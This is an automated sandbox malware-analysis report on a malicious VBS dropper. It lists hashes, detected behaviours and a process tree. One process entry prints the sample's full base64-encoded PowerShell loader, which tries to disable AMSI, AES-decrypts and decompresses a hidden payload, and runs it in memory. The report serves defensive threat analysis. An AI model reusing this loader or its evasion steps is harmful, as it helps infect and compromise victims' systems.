Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-02-2025 02:03
Static task
static1
Behavioral task
behavioral1
Sample
9491700097082_20250101_20250211_40489.vbs
Resource
win7-20240903-en
General
-
Target
9491700097082_20250101_20250211_40489.vbs
-
Size
61KB
-
MD5
6b21159837ddee24c19775ca1f5ec62d
-
SHA1
d68d6100363fd75679c69111288d9fa692b35cba
-
SHA256
1bf0f448a3723866f225527bd1cae2d5062ca48c298b425c11968b4bbddca5c8
-
SHA512
2633084c9bf5db0e2f241a33692ce9069ba04fa72c5b8d7cbdb1573f469b039cf1d99836fe21cb5eef0cc7744ecbdb6f1dcdee82c88c851aaa10e5293a8ac023
-
SSDEEP
768:e2ysVepqc8QaEiZ7LfrPBW/2Vbt804sXcYpr6qDaR2UjKWlAi4fKds8kzB6oerlN:m9a5bBvVbu04s5CR2lWiIAwltrQRFY
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1988 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1988 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2396 wrote to memory of 2884 2396 WScript.exe 30 PID 2396 wrote to memory of 2884 2396 WScript.exe 30 PID 2396 wrote to memory of 2884 2396 WScript.exe 30 PID 2884 wrote to memory of 2480 2884 cmd.exe 32 PID 2884 wrote to memory of 2480 2884 cmd.exe 32 PID 2884 wrote to memory of 2480 2884 cmd.exe 32 PID 2480 wrote to memory of 2800 2480 cmd.exe 34 PID 2480 wrote to memory of 2800 2480 cmd.exe 34 PID 2480 wrote to memory of 2800 2480 cmd.exe 34 PID 2480 wrote to memory of 1988 2480 cmd.exe 35 PID 2480 wrote to memory of 1988 2480 cmd.exe 35 PID 2480 wrote to memory of 1988 2480 cmd.exe 35 PID 2480 wrote to memory of 1988 2480 cmd.exe 35
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9491700097082_20250101_20250211_40489.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\EWVm.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\EWVm.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\EWVm.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnYVZOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDE0VTFSU1NVNUhVa0ZPUkU5TklDaFRWRkpKVGtkU1FVNUVUMDBvVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUWGRUVkZKSlRrZFNRVTVFVDAxeVUxUlNTVTVIVWtGT1JFOU5JQzFUVkZKSlRrZFNRVTVFVDAxVlUxUlNTVTVIVWtGT1JFOU5jMU5VVWtsT1IxSkJUa1JQVFdWVFZGSkpUa2RTUVU1RVQwMUNVMVJTU1U1SFVrRk9SRTlOWVZOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TlkxTlVVa2xPUjFKQlRrUlBUVkJUVkZKSlRrZFNRVTVFVDAxaFUxUlNTVTVIVWtGT1JFOU5jbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMXBVMVJTU1U1SFVrRk9SRTlOYmxOVVVrbE9SMUpCVGtSUFRXZFRWRkpKVGtkU1FVNUVUMDBnSWxOVVVrbE9SMUpCVGtSUFRXaFRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TmRGTlVVa2xPUjFKQlRrUlBUWEJUVkZKSlRrZFNRVTVFVDAwNlUxUlNTVTVIVWtGT1JFOU5MMU5VVWtsT1IxSkJUa1JQVFM5VFZGSkpUa2RTUVU1RVQwMDRVMVJTU1U1SFVrRk9SRTlOTjFOVVVrbE9SMUpCVGtSUFRTNVRWRkpKVGtkU1FVNUVUMDB4VTFSU1NVNUhVa0ZPUkU5Tk1sTlVVa2xPUjFKQlRrUlBUVEZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5OMU5VVWtsT1IxSkJUa1JQVFRsVFZGSkpUa2RTUVU1RVQwMHVVMVJTU1U1SFVrRk9SRTlOTVZOVVVrbE9SMUpCVGtSUFRUQlRWRkpKVGtkU1FVNUVUMDB6VTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV1JUVkZKSlRrZFNRVTVFVDAxdlUxUlNTVTVIVWtGT1JFOU5kMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMXNVMVJTU1U1SFVrRk9SRTlOYjFOVVVrbE9SMUpCVGtSUFRXRlRWRkpKVGtkU1FVNUVUMDFrVTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAxaVUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFM1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOZUZOVVVrbE9SMUpCVGtSUFRYUlRWRkpKVGtkU1FVNUVUMDBpVTFSU1NVNUhVa0ZPUkU5TktWTlVVa2xPUjFKQlRrUlBUUzVUVkZKSlRrZFNRVTVFVDAxRFUxUlNTVTVIVWtGT1JFOU5iMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOWlZOVVVrbE9SMUpCVGtSUFRXNVRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TkxsTlVVa2xPUjFKQlRrUlBUVkpUVkZKSlRrZFNRVTVFVDAxbGNHeGhZMlVvSjBGQ1F5Y3NKeWNwS1NBdFJYSnliM0pCWTNScGIyNGdVMmxzWlc1MGJIbERiMjUwYVc1MVpUcz0nKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c1JvdXRpbmUgLURpc2FibGVTdmMgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIm1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gTFVVTFkoJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnbU91cis5SEZTR01XckFUaTVDdHVPOEZmVTV3RUlubW5scnFERzNyWnBkYz0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCcwdksyZFh0TEZjZDNoMEJHaHJpZUlnPT0nKTskSlZTVE49JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JExKVFNWPSRKVlNUTi5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JEpWU1ROLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JExKVFNWO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRHWUpWQz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRJRkpQUj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JEhXTlZYPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJEdZSlZDLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskSFdOVlguQ29weVRvKCRJRkpQUik7JEhXTlZYLkRpc3Bvc2UoKTskR1lKVkMuRGlzcG9zZSgpOyRJRkpQUi5EaXNwb3NlKCk7JElGSlBSLlRvQXJyYXkoKTt9JEZOUlVMPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKExVVUxZIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJEZOUlVMLCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "4⤵PID:2800
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD530179bad5e03a30e4504d17b8d229040
SHA12c83202965edce60712bd659c130e092d23661a1
SHA25641f5621dc203a8593337d685d66fb8337a305e35b0d9b0b825d5e33618e9b24d
SHA512ffe737e2575ac951572736654decd3cbe07ba07d46def5876e87f8626e5fb93eb437596d04c387fe66c3fa6ec3c9cd5dd04389a5ac8fcdefac3693226fe1efc3